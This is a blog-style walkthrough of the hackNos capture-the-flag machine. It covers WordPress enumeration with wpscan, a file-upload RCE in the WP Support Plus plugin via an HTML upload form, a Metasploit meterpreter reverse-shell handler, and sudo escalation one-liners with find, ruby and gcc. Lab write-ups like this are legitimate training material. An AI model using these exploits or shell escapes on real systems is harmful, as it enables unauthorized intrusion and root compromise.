hackNos is machine with an interesting mix of realism and CTF style tricks. Even-though the underlying vulnerabilities are pretty straightforward to exploit, this machine demands next level enumeration skills. Thanks to Rahul Gehlaut for this amazing box.
Level: Intermediate
You need to fire arp-scan or netdiscover to find the IP of hackNos. There are only two services- HTTP(80) and MySQL(3306).
Press enter or click to view image in full size
Press enter or click to view image in full size
Enumeration
I could see an apache default page but was unable to find any useful paths. I ran dirb with common, big word-lists, tried extension based dir-busting. Even tried my luck on cewl to generate a custom word-list. But I couldn’t find any leads.
Press enter or click to view image in full size
After a good sleep after the hectic work week, I sat and thought though. In half an hour of enumeration, I found the clue on the default page itself, that the document root is /var/www/html/g@web. That usually means the default index.html page you are seeing is inside g@web folder. However , in this site the document root is not /var/www/html/g@web but it is /var/www/html (I know, information on the page is misleading but possibility a CTF style modification).
You need to browse to http://192.168.56.107/g@web/ to find a WordPress blog.
Press enter or click to view image in full size
Press enter or click to view image in full size
When it comes to WordPress enumeration, my favorite tool is wpscan. But make sure that you run wpscan using the API key, which you can generate from wpvulndb.com(You need to register a free account) to see all vulnerabilities.
wpscan --url http://192.168.56.107/g@web/ --api-token <token>Press enter or click to view image in full size
When it comes to WordPress, not updating plugins can largely undermine the security of the website. WP Support Plus Responsive Ticket System v 7.1.3 is in use here, which is vulnerable to SQL injection, RCE via file upload and privilege escalation.
Press enter or click to view image in full size
Exploiting RCE for shell
If you read the advisory WPVDB ID-10119 for remote code execution, it is self explanatory. Our vulnerable plugin does not restrict the upload of .phtml, .php5 and similar lesser known PHP extensions, enabling us to upload reverse shell PHP code in .phtml format.
Get Dot Dot Slash’s stories in your inbox
Join Medium for free to get updates from this writer.
I used the reverse shell PHP payload in /usr/share/webshells/php/ folder which will be uploaded to http://192.168.56.107/g@web/wp-content/uploads/wpsp/ folder using below sample code. PHP reverse shell payload should be edited to match your netcat listener and should be named in .phtml or .php5 format.
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://192.168.56.107/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
</body>
</html>Press enter or click to view image in full size
Press enter or click to view image in full size
Alternatively we can use wordpress-exploit-framework, which is an awesome tool by rastating and it is pretty much like the Metasploit for WordPress. Tool supports Metasploit payloads and follows the familiar syntax of Metasploit.
Press enter or click to view image in full size
Press enter or click to view image in full size
#commands to run the exploit module on wpxf
wpxf #command to start wordpress-exploit-framework
search wp_support
use exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload
set host 192.168.56.107
set target_uri /g@web
set payload meterpreter_reverse_tcp
set lport 8443
set lhost 192.168.56.103#Do not forget to spin up a handler in Metasploit
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.56.103
set lport 8443
run
Shell is only a beginning
Way beyond shell was frustrating. I pursued various vectors including local exploits, reusing password disclosed on wp-config.php, cracking user passwords looted from WordPress database etc. Later I found the necessary hint from the wp_usermeta table inside the database in the form of meta_value.
Tip: You need an interactive shell to work with MySQL normally, in restrictive shells use python -c ‘import pty; pty.spawn(“/bin/sh”)’ to spawn an interactive shell.
mysql -u wp -pPress enter or click to view image in full size
Press enter or click to view image in full size
After few trial and error attempts I was able to login as security local user with the password we found earlier.
Press enter or click to view image in full size
Linux-smart-enumeration is usually my trusty script on any Linux box for local enumeration. I found from LSE output that, the user named security has access to run find command as hackNos-boat. GTFOBins is an awesome project, which can help us in situations involving SUID or sudo misconfigurations. They maintain a curated list of all known attack vectors for Unix binaries. We can use below command to escalate our privileges.
#https://gtfobins.github.io/gtfobins/find/
sudo -u hackNos-boat find . -exec /bin/sh \; -quitPress enter or click to view image in full size
Press enter or click to view image in full size
The hackNos-boat user has similar access to run ruby as hunter. Hunter account has access to the user flag.
#https://gtfobins.github.io/gtfobins/ruby/
sudo -u hunter ruby -e 'exec "/bin/sh"'Press enter or click to view image in full size
Similarly, hunter has sudo access to gcc. At this point rooting is trivial.
#https://gtfobins.github.io/gtfobins/gcc/#shell
sudo gcc -wrapper /bin/sh,-s .Press enter or click to view image in full size
Press enter or click to view image in full size
Closing Thoughts
hackNos is a good machine with focus on enumeration. GTFO chaining scenario was fun. Overall a solid challenge.